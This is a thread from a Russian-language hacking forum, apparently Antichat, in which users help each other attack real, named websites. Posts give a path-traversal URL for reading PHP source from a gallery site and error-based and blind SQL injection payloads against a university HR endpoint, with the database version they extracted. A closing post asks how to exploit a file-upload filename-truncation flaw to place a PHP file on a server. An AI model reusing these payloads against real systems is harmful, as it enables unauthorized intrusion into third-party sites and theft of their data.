14.02.2018, 15:55
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами:
5344886
Репутация:
441
|
|
Сообщение от z3u5
↑
Спасибо, как читалку отличить от инклуда? Пускать в логи должно?
С большой долей вероятности можно определить исходя из контекста. В этом случае, по URI видно, что используется некий функционал галереи, а по заголовкам можно понять, что отдаётся содержимое файла:
Код:
Content-Disposition: inline; filename=""
Content-Length: 0
Connection: close
Content-Type: image/jpeg
Но если какие либо внешние факторы отсутствуют, то да, нужно подтверждать экспериментально.
Читалка/инклуд на доступ к логам не влияют. Зависит от настроек системы и текущего пользователя.
|
|
|
14.02.2018, 16:17
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами:
5344886
Репутация:
441
|
|
Сообщение от crlf
↑
Но если какие либо внешние факторы отсутствуют, то да, нужно подтверждать экспериментально.
Либо прочитать любой PHP скрипт
Код:
https://www.enature.net/nudist_gallery/full_image/?page=/../index.php
|
|
|
|
14.02.2018, 16:35
|
|
Новичок
Регистрация: 30.06.2013
Сообщений: 12
С нами:
6773366
Репутация:
0
|
|
Сообщение от crlf
↑
С большой долей вероятности можно определить исходя из контекста. В этом случае, по URI видно, что используется некий функционал галереи, а по заголовкам можно понять, что отдаётся содержимое файла:
Код:
Content-Disposition: inline; filename=""
Content-Length: 0
Connection: close
Content-Type: image/jpeg
Но если какие либо внешние факторы отсутствуют, то да, нужно подтверждать экспериментально.
Читалка/инклуд на доступ к логам не влияют. Зависит от настроек системы и текущего пользователя.
Спасибо, я гуманитарий просто. А если нет доступа к логам - как выглядит процесс запуска своего кода, через сеансы?
|
|
|
|
14.02.2018, 16:43
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
|
|
|
|
14.02.2018, 16:45
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами:
5344886
Репутация:
441
|
|
Сегодня день инклудов В этом посте есть ссылка, на хороший материал. |
|
|
|
16.02.2018, 21:34
|
|
Участник форума
Регистрация: 20.04.2016
Сообщений: 185
С нами:
5297366
Репутация:
47
|
|
Сообщение от Octavian
↑
Есть тут Sql Injection или просто ошибка? UPD: Она тут есть но не могу найти вектор
Код:
https://ums.usmf.md/hr/logAction.php/1'
Error-Based вектор, фильтруется запятая.
|
|
|
|
16.02.2018, 21:40
|
|
Флудер
Регистрация: 19.06.2015
Сообщений: 4,126
С нами:
5738006
Репутация:
147
|
|
Код:
https://ums.usmf.md/hr/logAction.php/Z' or substring(@@version from 1 for 1)=5-- -
|
|
|
|
16.02.2018, 21:43
|
|
Участник форума
Регистрация: 20.04.2016
Сообщений: 185
С нами:
5297366
Репутация:
47
|
|
JOIN.
Сообщение от ms13
↑
Код:
https://ums.usmf.md/hr/logAction.php/Z' or substring(@@version from 1 for 1)=5
Ну, как вариант, если интересно слепые крутить.
|
|
|
|
16.02.2018, 21:47
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Код:
1 https://ums.usmf.md/hr/logAction.php/Z'=0 group by mid(@@version from floor(rand(0)*2))having avg(0)-- -
2 https://ums.usmf.md/hr/logAction.php/Z'--~(select*from(select@@version)f)-- -
1. Duplicate entry '5.6.28' for key 'group_key'
2. BIGINT value is out of range in '-(~((select '5.6.28' from dual)))'
|
|
|
|
19.02.2018, 22:44
|
|
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами:
5710646
Репутация:
24
|
|
Есть сайт загружает
Код:
6621519064845-asd.php.jpg
загрузил длинное название с расчетом на обрез
Код:
6621519064845-(около 200 символов).php.jpg
в результате получил что ожидал
Код:
6621519064845-(около 200 символов).php
но увы при запись в бд обрезается но на сервере сохраняет оригинал
Код:
6621519064845-(около 200 символов).php.jpg
Вопрос какое название носят такие уязвимость, и какие фичи эксплуатации можно попробовать? По длине php никак не обрежет ? |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
